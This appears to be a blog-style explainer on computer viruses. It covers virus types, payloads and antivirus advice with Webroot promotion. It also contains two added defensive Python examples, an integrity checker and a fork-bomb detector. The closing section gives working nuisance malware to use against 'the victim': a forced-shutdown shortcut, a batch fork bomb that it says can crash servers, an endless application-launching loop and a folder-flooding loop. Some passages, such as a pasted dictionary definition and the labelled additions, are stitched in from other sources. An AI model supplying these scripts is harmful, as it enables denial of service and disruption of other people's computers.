What is a Computer Virus?
A computer virus is a malicious piece of code that copies itself and can have a drastic effect on a system, such as corrupting files or system data, deleting files or destroying data. Designed to replicate relentlessly, computer viruses infect your programs and files, alter the way your computer operates or stop it from working altogether.
What does a Computer Virus do?
Some computer viruses are programmed to harm your computer by damaging programs or deleting files. A computer virus might corrupt or delete data on your computer, use your email program to spread itself to other computers, or even erase everything on your hard disk. Others simply replicate themselves or flood a network with traffic, making it impossible to perform any internet activity. Even less harmful computer viruses can significantly disrupt your system’s performance, sapping computer memory and causing frequent computer crashes.
Viruses can infect a number of different portions of the computer’s operating and file system. These include:
# System Sectors
# Files
# Macros
# Companion Files
# Directories (Cluster) Viruses
# Batch Files
# Source Code
# Visual Basic Files
# Screensaver
# Vulnerabilities
How does a Computer Virus find me?
# From removable media
# From downloads off the Internet
# From e-mail attachments
# Sharing music files, video files, greeting cards or funny images with other users.
# Visiting an infected Web site.
# Opening spam email or an email attachment.
# Downloading free games, toolbars, media players and other system utilities.
# Installing mainstream software applications without fully reading license agreements.
What are the symptoms of a Computer Virus?
Your computer may be infected if you recognize any of these malware symptoms:
# Slow computer performance
# Erratic computer behavior
# Unexplained data loss
# Frequent computer crashes
Types of Virus
There are many types of viruses and most of them can be described according to their code. Some of them are:
1. Resident Viruses
A resident virus is a computer virus that stores itself within memory, allowing it to infect other files even when the originally infected program has been terminated. This type of virus is permanent and dwells in RAM. From there it can overcome and interrupt all of the operations executed by the system, corrupting files and programs that are opened, closed, copied, renamed, etc.
Examples include: Randex, CMJ, Meve, and MrKlunky.
2. Multipartite Viruses
Multipartite viruses are distributed through infected media
and usually hide in the memory. Gradually, the virus moves to the boot sector
of the hard drive and infects executable files on the hard drive and later
across the computer system.
3. Direct Action Viruses
The main purpose of this virus is to replicate and take
action when it is executed. When a specific condition is met, the virus will go
into action and infect files in the directory or folder that it is in and in
directories that are specified in the AUTOEXEC.BAT file PATH. This batch file
is always located in the root directory of the hard disk and carries out
certain operations when the computer is booted.
4. Overwrite Viruses
A virus of this kind is characterized by the fact that it
deletes the information contained in the files that it infects, rendering them
partially or totally useless once they have been infected.
The only way to clean a file infected by an overwrite virus
is to delete the file completely, thus losing the original content.
Examples of this virus include: Way, Trj.Reboot,
Trivial.88.D.
5. Boot Virus
This type of virus affects the boot sector of a floppy or
hard disk. This is a crucial part of a disk, in which information on the disk
itself is stored together with a program that makes it possible to boot (start)
the computer from the disk.
The best way of avoiding boot viruses is to ensure that
floppy disks are write-protected and never start your computer with an unknown
floppy disk in the disk drive.
Examples of boot viruses include: Polyboot.B, AntiEXE.
6. Macro Virus
Macro viruses infect files that are created using certain
applications or programs that contain macros. These mini-programs make it
possible to automate series of operations so that they are performed as a
single action, thereby saving the user from having to carry them out one by
one.
Examples of macro viruses: Relax, Melissa.A, Bablas,
O97M/Y2K.
7. Directory Virus
Directory viruses change the paths that indicate the
location of a file. By executing a program (file with the extension .EXE or
.COM) which has been infected by a virus, you are unknowingly running the virus
program, while the original file and program have been previously moved by the
virus.
Once infected it becomes impossible to locate the original
files.
8. Polymorphic Virus
Polymorphic viruses encrypt or encode themselves in a
different way (using different algorithms and encryption keys) every time they
infect a system.
This makes it impossible for anti-viruses to find them using
string or signature searches (because they are different in each encryption)
and also enables them to create a large number of copies of themselves.
Examples include: Elkern, Marburg, Satan Bug, and Tuareg.
9. File Infectors
This type of virus infects programs or executable files
(files with an .EXE or .COM extension). When one of these programs is run,
directly or indirectly, the virus is activated, producing the damaging effects
it is programmed to carry out. The majority of existing viruses belong to this
category, and can be classified depending on the actions that they carry out.
10. Encrypted Viruses
This type of virus consists of encrypted malicious code and a
decryption module. These viruses use an encrypted-code technique that makes
them hard for antivirus software to detect. An antivirus program can usually
detect this type of virus when it decrypts itself in order to spread.
11. Companion Viruses
Companion viruses can be considered file infector viruses
like resident or direct action types. They are known as companion viruses
because once they get into the system they "accompany" the other
files that already exist. In other words, in order to carry out their infection
routines, companion viruses can wait in memory until a program is run (resident
viruses) or act immediately by making copies of themselves (direct action
viruses).
Some examples include: Stator, Asimov.1539, and Terrax.1069
12. Network Virus
Network viruses rapidly spread through a Local Area Network
(LAN), and sometimes throughout the internet. Generally, network viruses
multiply through shared resources, i.e., shared drives and folders. When the
virus infects a computer, it searches through the network to attack its new
potential prey. When the virus finishes infecting that computer, it moves on to
the next and the cycle repeats itself.
The most dangerous network viruses are Nimda and SQLSlammer.
13. Nonresident Viruses
This type of virus is similar to resident viruses in that it uses a
replication module. In addition, a nonresident virus has a finder module,
which infects files when it finds them (it selects one or more files
to infect each time the module is executed).
14. Stealth Viruses
Stealth viruses are viruses that try to trick
anti-virus software by intercepting its requests to the operating system. They
are able to hide themselves from some antivirus programs, so
some antivirus programs cannot detect them.
15. Sparse Infectors
In order to spread widely, a virus must attempt to avoid detection.
To minimize the probability of its being discovered a virus could use any
number of different techniques. It might, for example, only infect every 20th
time a file is executed; it might only infect files whose lengths are within
narrowly defined ranges or whose names begin with letters in a certain range of
the alphabet. There are many other possibilities.
16. Spacefiller (Cavity) Viruses
Many viruses take the easy way out when infecting files;
they simply attach themselves to the end of the file and then change the start
of the program so that it first points to the virus and then to the actual
program code. Many viruses that do this also implement some stealth techniques
so you don't see the increase in file length when the virus is active in memory.
A spacefiller (cavity) virus, on the other hand, attempts to
be clever. Some program files, for a variety of reasons, have empty space
inside of them. This empty space can be used to house virus code. A spacefiller
virus attempts to install itself in this empty space while not damaging the
actual program itself. An advantage of this is that the virus then does not
increase the length of the program and can avoid the need for some stealth
techniques. The Lehigh virus was an early example of a spacefiller virus.
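The difference between an appended infection and a cavity infection, seen from the side of an integrity checker (an added example, not part of the original post; the byte strings are constructed stand-ins, not real program or virus code). A length check catches only the first case, while a stored hash catches both.

```python
import hashlib

def longest_zero_run(data: bytes) -> int:
    """Length of the longest run of 0x00 bytes, i.e. the largest unused cavity."""
    best = run = 0
    for byte in data:
        run = run + 1 if byte == 0 else 0
        best = max(best, run)
    return best

def fingerprint(data: bytes) -> dict:
    """What an integrity baseline records for one file."""
    return {"size": len(data),
            "sha256": hashlib.sha256(data).hexdigest(),
            "zero_run": longest_zero_run(data)}

def size_only_check(baseline: dict, data: bytes) -> bool:
    """The naive length comparison that a cavity infection does not trip."""
    return len(data) != baseline["size"]

def classify(baseline: dict, current: dict) -> str:
    """Compare a file's current fingerprint with its stored baseline."""
    if current["sha256"] == baseline["sha256"]:
        return "unchanged"
    if current["size"] != baseline["size"]:
        return "modified: length changed (consistent with appended code)"
    if current["zero_run"] < baseline["zero_run"]:
        return "modified: same length, padding shrank (consistent with a filled cavity)"
    return "modified: same length"

# Constructed sample data: a stand-in "program" with a 64-byte block of padding.
CLEAN = b"MZ" + b"CODE" * 8 + b"\x00" * 64 + b"DATA" * 8
MARKER = b"X" * 32                        # inert stand-in for foreign bytes
APPENDED = CLEAN + MARKER                 # appended case: file grows by 32 bytes
_pad = CLEAN.index(b"\x00")               # start of the padding block
CAVITY = CLEAN[:_pad] + MARKER + CLEAN[_pad + len(MARKER):]   # same length

if __name__ == "__main__":
    base = fingerprint(CLEAN)
    for name, blob in [("clean", CLEAN), ("appended", APPENDED), ("cavity", CAVITY)]:
        print(name, size_only_check(base, blob), classify(base, fingerprint(blob)))
```
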
17. FAT Virus
The file allocation table or FAT is the part of a disk used
to connect information and is a vital part of the normal functioning of the
computer.
This type of virus attack can be especially dangerous, by
preventing access to certain sections of the disk where important files are
stored. Damage caused can result in information losses from individual files or
even entire directories.
What does a Payload mean?
A payload refers to the component of a computer virus that
executes a malicious activity. Apart from the speed in which a virus spreads,
the threat level of a virus is calculated by the damages it causes. Viruses
with more powerful payloads tend to be more harmful.
Although not all viruses carry a payload, a few payloads are
considered extremely dangerous. Some of the examples of payloads are data
destruction, offensive messages and the delivery of spam emails through the
infected user's account.
Some viruses just copy themselves from one computer to
another. Other viruses may steal data or files, permit eavesdropping or
unauthorized access, destroy data and cause other consequences. It is also
possible for a virus to carry multiple payloads.
A payload is any action performed by a program aside from the act
of spreading itself. The payload of a virus or worm can range from
irreparably damaging the operating system or even the BIOS (as with the CIH virus)
to almost nothing (as with the Badtrans worm), or even something benevolent like
removing a malicious program (Sasser, YahaSux, Welchia). Sometimes a payload is
a consciously coded part of the program, as with the Ramen worm, or it could
simply be a product of its existence and spreading, as with the Slammer worm.
Some of the ways to execute a payload include:
# By booting the computer using an infected removable
medium
# By opening an infected file
# By executing an infected program
# By activating a logic bomb
Arm yourself against Computer Viruses
When you arm yourself with information and resources, you’re
wiser about computer security threats and less vulnerable to threat tactics.
Take these steps to safeguard your PC with the best computer virus protection:
1. Make sure that you have the best security software
products installed on your computer :
# Use antivirus protection and a firewall
# Get antispyware software
# Always keep your antivirus protection and antispyware
software up-to-date
# Update your operating system regularly
# Increase your browser security settings
# Avoid questionable Web sites
# Only download software from sites you trust. Carefully
evaluate free software and file sharing applications before downloading
them.
2. Practice safe email protocol :
# Don't open messages from unknown senders
# Immediately delete messages you suspect to be spam
# An unprotected computer is like an open door for
computer viruses.
# Firewalls monitor Internet traffic in and out of your
computer and hide your PC from online scammers looking for easy
targets.
# Products like Webroot Internet Security Essentials and
Webroot AntiVirus with Spy Sweeper provide complete protection from the
two most dangerous threats on the Internet: spyware and computer
viruses.
# They thwart threats before they can enter your PC, stand
guard at every possible entrance of your computer and fend off any
computer virus that tries to enter, even the most damaging and devious
strains.
3. While free antivirus downloads are available, they just
can't offer the computer virus help you need to keep up with the continuous
onslaught of new strains. Previously undetected forms can often do the most
damage, so it’s critical to have up-to-the-minute, guaranteed antivirus
protection.
4. Small but insidious piece of programming-code that
attacks computer and network systems through 'contaminated' (infected) data
files, introduced into a system via disks or internet. As a digital equivalent
of biological microorganisms, it attaches itself to the target computer's
operating system or other programs, and automatically replicates itself to
spread to other computers or networks. Invented in the 1960s as a prank, viruses
come in thousands of types and versions with new ones being invented every day,
each requiring a different cure (see antivirus and vaccine). While a few
viruses are harmless diversions, most are malicious and cause widespread and
severe damage and may bring down entire communication-networks or websites.
Some are immediately active, others remain latent for weeks or months, or work
slowly to avoid detection and cause destruction over long periods. Propagation
of computer viruses is a serious crime in many countries. See also Trojan
horse, and worm.
Let's create some harmless viruses :p
1) Shutdown Virus
1. Right-click on the Desktop > New > Shortcut
2. A wizard dialogue box opens and asks you to type the location of the
item. Type:
shutdown.exe -s -t ## -c "**"
Replace ** with the message you want to pop up,
and keep the quotation marks.
Replace ## with how much time you want to give
before the computer shuts down.
After you click Next, type whatever name you want the file
to have, and then you can change its look.
Your shutdown virus is ready to run :p
2) Fork Bomb
A fork bomb is considered to be the smallest writable virus
in the batch language. It is annoying if launched on a
home computer, but on a server it will probably result in a crash.
A fork bomb creates two instances, which each create two
instances, and so on. The processes fork recursively; this “forks” the processor
and jams it completely until a crash occurs.
Here is how to make it.
Open up notepad and type:
%0|%0
and save it as fork.bat
Yep, it's a virus of just 5 characters :P
Double-clicking this file leads to a total CPU jam
by opening about 500+ command prompt processes.
Once a successful fork bomb has activated in a system, one
may have to reboot to resume normal operation. Stopping a fork bomb requires
destroying all running instances of it.
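One way to spot the doubling process tree described above in a process snapshot, and to list every instance that has to be stopped (an added example, not part of the original post; the snapshot, its PIDs and the command line "cmd.exe /c fork.bat" are constructed assumptions):

```python
from collections import defaultdict

def find_process_storms(snapshot, threshold=50, self_ratio=0.9):
    """Flag command lines with many instances that were mostly spawned by
    another instance of the same command line (self-replication).
    snapshot: iterable of (pid, ppid, image, cmdline) tuples."""
    by_pid = {pid: (ppid, cmd) for pid, ppid, _image, cmd in snapshot}
    groups = defaultdict(list)
    for pid, (_ppid, cmd) in by_pid.items():
        groups[cmd].append(pid)

    def parent_cmd(pid):
        parent = by_pid.get(by_pid[pid][0])
        return parent[1] if parent else None

    findings = []
    for cmd, pids in groups.items():
        if len(pids) < threshold:
            continue
        roots = [p for p in pids if parent_cmd(p) != cmd]
        if (len(pids) - len(roots)) / len(pids) >= self_ratio:
            # Every instance must be stopped, so report the full PID list.
            findings.append({"cmdline": cmd, "instances": len(pids),
                             "roots": roots, "pids": sorted(pids)})
    return findings

def constructed_snapshot(depth=8):
    """Constructed sample: a normal process set plus a doubling cmd.exe tree."""
    procs = [(4, 0, "System", "System"), (500, 4, "explorer.exe", "explorer.exe"),
             (600, 4, "services.exe", "services.exe")]
    # 60 identical service hosts: numerous, but not spawned by each other.
    procs += [(700 + i, 600, "svchost.exe", "svchost.exe -k netsvcs") for i in range(60)]
    bomb = "cmd.exe /c fork.bat"             # assumed command line, for illustration
    procs.append((1000, 500, "cmd.exe", bomb))
    level, next_pid = [1000], 1001
    for _ in range(depth):                   # each instance starts two more
        children = []
        for parent in level:
            for _ in range(2):
                procs.append((next_pid, parent, "cmd.exe", bomb))
                children.append(next_pid)
                next_pid += 1
        level = children
    return procs

if __name__ == "__main__":
    for f in find_process_storms(constructed_snapshot()):
        print(f["cmdline"], f["instances"], "root PIDs:", f["roots"])
```

The 60 identical svchost.exe entries pass the count threshold but are not flagged, because none of them has a parent running the same command line.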
3) Application Bomber
Write the code below in Notepad or any text editor, save
it with any name but with the extension ".bat", and then double-click it to run
it.
@echo off
REM "@echo off" hides the commands when the batch file is executed
REM :x is the label that the loop jumps back to
:x
start winword
REM open Paint
start mspaint
start notepad
start write
REM open Command Prompt
start cmd
start explorer
start control
REM open Calculator
start calc
REM infinite loop
goto x
This code, when executed, will repeatedly open different applications
such as Paint, Notepad and Command Prompt, irritating the victim and of course
affecting performance.
4) Folder flooder
Write the code below in Notepad or any text editor, save
it with any name but with the extension ".bat", and then double-click it to run
it.
@echo off
:x
REM md makes a directory/folder
md %random%
goto x
Here %random% is a variable that generates a random positive
number, so this code keeps creating folders whose names
can be any random number.